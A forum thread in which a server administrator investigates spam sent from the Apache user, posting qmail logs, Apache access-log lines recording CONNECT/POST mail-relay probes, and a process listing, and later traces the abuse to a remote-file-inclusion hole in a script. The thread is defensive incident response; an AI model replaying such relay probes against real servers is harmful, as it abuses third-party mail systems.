Results 1 to 7 of 7
  1. #1

    Apache Sending Spam

    Yesterday my mail logs started showing many a spam email being sent from my server. There isn't anything mission critical running on it, so I took down qmail until I could find the vulnerability and fix it. But try as I might, I haven't found any conclusive vulnerability, so I thought to ask here where someone with more experience might spot something obvious that I've missed (I'm still somewhat new to this).

    Anyway, the qmail logs show that the messages came from uid 48, apache. Log excerpt (sending of first spam mail):
    Aug 28 11:10:51 host qmail-queue[8056]: mail: all addreses are uncheckable - need to skip scanning (by deny mode)
    Aug 28 11:10:51 host qmail-queue[8056]: scan: the message(drweb.tmp.TNDOi2) sent by anonymous@HOSTNAME to SPAMADDRESS should be passed without checks, because contains uncheckable addresses
    Aug 28 11:10:51 host qmail: 1188295851.742521 new msg 51970054
    Aug 28 11:10:51 host qmail: 1188295851.742679 info msg 51970054: bytes 445 from <anonymous@HOSTNAME> qp 8057 uid 48
    Aug 28 11:10:51 host qmail: 1188295851.752799 starting delivery 460: msg 51970054 to remote SPAMADDRESS
    Aug 28 11:10:51 host qmail: 1188295851.752933 status: local 0/10 remote 1/20
    Unfortunately, my Apache logs have no entries around the time when these messages were sent. There are some suspect "CONNECT" requests scattered throughout the logs, but all are denied with 405's, and none correspond exactly with the time of the spam. Example (from about 3 hours after the spam):
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "CONNECT 205.158.62.146:25 HTTP/1.0" 405 235 "-" "-"
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "PUT http://205.158.62.146:25/ HTTP/1.0" 405 231 "-" "-"
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "POST http://205.158.62.146:25/ HTTP/1.0" 200 2 "-" "-"
    (The fact that the final query wasn't denied worries me slightly though. Does anyone have any insight?)

    I'm not sure where to go from here. I'm concerned about the lack of logs by Apache. There's a nine hour period without any entries; not unusual for my server given that its not very active, but the time when the spam was sent falls in this time period. I've checked for common security issues, but qmail is configured only to relay from localhost, and Apache isn't configured as an open proxy. Are there any other common issues I should check for? Is there any other information I should post here to help identify the problem?

    I'm running Apache version 2.0.52, and qmail 1.03.

    I'd be very grateful for any help or links to relevant HOWTOs.

  2. #2
    it would appear that someones trying to hack you. the fact that your server is still online, should be assurance that they've not succeeded.

  3. #3
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,074
    Quote Originally Posted by psychomarine View Post
    it would appear that someones trying to hack you. the fact that your server is still online, should be assurance that they've not succeeded.
    Incorrect. They are trying to connect and relay mail, and being "on line" doesn't mean a server isn't hacked. Not all hacking kills the box it's done to; in fact, what would be the point?
    Your one stop shop for decentralization

  4. #4
    idk, whatever I gain access to, I ruin, so forgive me for assuming that others dont.

  5. #5
    Quote Originally Posted by bear View Post
    Incorrect. They are trying to connect and relay mail, and being "on line" doesn't mean a server isn't hacked. Not all hacking kills the box it's done to; in fact, what would be the point?
    I agree , most people who gain access to a server use it for mostly the following:

    1) To run ircd bots
    2) To use it for DoS
    3) To use it to send spam mails/phishing emails
    4) To host phishing pages

    There are very less incidents where the "hacker" ruins the server .

  6. #6
    Quote Originally Posted by jtobin View Post
    Yesterday my mail logs started showing many a spam email being sent from my server. There isn't anything mission critical running on it, so I took down qmail until I could find the vulnerability and fix it. But try as I might, I haven't found any conclusive vulnerability, so I thought to ask here where someone with more experience might spot something obvious that I've missed (I'm still somewhat new to this).

    Anyway, the qmail logs show that the messages came from uid 48, apache. Log excerpt (sending of first spam mail):
    Unfortunately, my Apache logs have no entries around the time when these messages were sent. There are some suspect "CONNECT" requests scattered throughout the logs, but all are denied with 405's, and none correspond exactly with the time of the spam. Example (from about 3 hours after the spam):
    (The fact that the final query wasn't denied worries me slightly though. Does anyone have any insight?)

    I'm not sure where to go from here. I'm concerned about the lack of logs by Apache. There's a nine hour period without any entries; not unusual for my server given that its not very active, but the time when the spam was sent falls in this time period. I've checked for common security issues, but qmail is configured only to relay from localhost, and Apache isn't configured as an open proxy. Are there any other common issues I should check for? Is there any other information I should post here to help identify the problem?

    I'm running Apache version 2.0.52, and qmail 1.03.

    I'd be very grateful for any help or links to relevant HOWTOs.
    Check your mail logs as well , also paste an output of

    ps aux command . Also look at your /tmp folder for any hacks or suspicious files .

  7. #7
    I hadn't realised that if you give a log file in a vhost entry in Apache, that takes prioirity to the main log file, so the relevant logs were stored elsewhere. Once I found this, I quickly saw that someone was exploiting a vulnerable script to include remote files. The script in question is removed now, but I'm not sure how much damage they managed to do. Most of the scripts they used were designed for sending spam. Since the script was taken down, no more spam has been sent (that is, every remote email listed in the maillogs since then are legitimate). Still, I'm concerned that someone may be using the server to other ill ends, through whatever access they may have managed to get through the scripts.

    I've checked netstat, and all of the programs listening seem to be legitimate. rkhunter (fully updated) gave it a clean bill of health, apart from some out-dated software. None of the running processes jump out at me as malicious either, but I'm not very experienced so I've included the output to ps aux as requested:

    USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
    root 1 0.0 0.0 1616 612 ? Ss Sep01 0:00 init [3]
    root 5399 0.0 0.0 1520 544 ? Ss Sep01 0:00 syslogd -m 0
    named 7687 0.0 0.3 37028 3544 ? Ssl Sep01 0:02 /usr/sbin/named -u named -c /etc/named.conf -u named -t /var/named/run-root
    root 7700 0.0 0.1 3988 1060 ? Ss Sep01 0:00 /usr/sbin/sshd
    root 7710 0.0 0.0 2068 828 ? Ss Sep01 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
    root 7804 0.0 0.1 2140 1112 ? S Sep01 0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.pid
    mysql 7860 0.0 1.6 104652 17372 ? Sl Sep01 0:53 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
    root 8129 0.0 0.0 3480 804 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
    root 8131 0.0 0.0 3380 940 ? S Sep01 0:00 /usr/sbin/courierlogger imapd
    root 8146 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
    root 8148 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger imapd-ssl
    root 8158 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
    root 8160 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger pop3d
    root 8169 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995 /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
    root 8172 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger pop3d-ssl
    qmails 8188 0.0 0.0 1496 448 ? S Sep01 0:01 qmail-send
    qmaill 9217 0.0 0.0 1452 436 ? S Sep01 0:00 splogger qmail
    root 9219 0.0 0.0 1480 344 ? S Sep01 0:00 qmail-lspawn ./Maildir/
    qmailr 9220 0.0 0.0 1476 372 ? S Sep01 0:00 qmail-rspawn
    qmailq 9222 0.0 0.0 1444 316 ? S Sep01 0:00 qmail-clean
    root 9364 0.0 1.4 29948 15332 ? Ss Sep01 0:00 /usr/sbin/httpd
    popuser 9482 0.0 2.1 24492 22284 ? Ss Sep01 0:00 /usr/bin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 1 --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock --siteconfigpath=/dev/null
    popuser 9519 0.0 2.1 24436 22228 ? Ss Sep01 0:00 /usr/bin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 1 --pidfile=/var/run/spamd/spamd_light.pid --socketpath=/tmp/spamd_light.sock --siteconfigpath=/dev/null
    popuser 9532 0.0 1.9 24492 20624 ? S Sep01 0:00 spamd child
    popuser 9545 0.0 1.9 24436 20568 ? S Sep01 0:00 spamd child
    root 9621 0.0 0.4 47452 4760 ? Ss Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9625 0.0 1.9 52948 20904 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9626 0.0 1.8 52768 19024 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    psaadm 9627 0.0 1.8 51968 19540 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    psaadm 9628 0.0 2.4 55344 25220 ? S Sep01 0:02 /usr/local/psa/admin/bin/httpsd
    psaadm 9629 0.0 1.8 51724 19608 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9742 0.0 1.9 52204 20440 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    drweb 9782 0.0 1.4 18560 15388 ? Ss Sep01 0:54 /opt/drweb/drwebd
    root 9844 0.0 0.0 2456 916 ? Ss Sep01 0:00 crond
    root 9855 0.0 0.0 4032 808 ? Ss Sep01 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a shadow -n 2
    root 9856 0.0 0.0 4032 472 ? S Sep01 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a shadow -n 2
    psaadm 7857 0.0 1.0 50140 11044 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 8065 0.0 1.7 51932 18348 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    apache 13807 0.1 2.1 40404 22284 ? S 08:05 0:43 /usr/sbin/httpd
    apache 22017 0.1 2.1 41484 22984 ? S 08:31 0:44 /usr/sbin/httpd
    apache 9776 0.1 2.1 41576 22868 ? S 09:10 0:40 /usr/sbin/httpd
    apache 28149 0.1 2.2 41468 23628 ? S 09:16 0:35 /usr/sbin/httpd
    apache 29804 0.1 2.0 39040 21140 ? S 14:23 0:09 /usr/sbin/httpd
    Does anything look strange here?

    Finally, tmp contained a file called 'r00t', which certainly seemed to be the product of some attempt to gain more access. Nothing else jumped out at me, but I doubt every malicious executable is going to be so obviously named.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •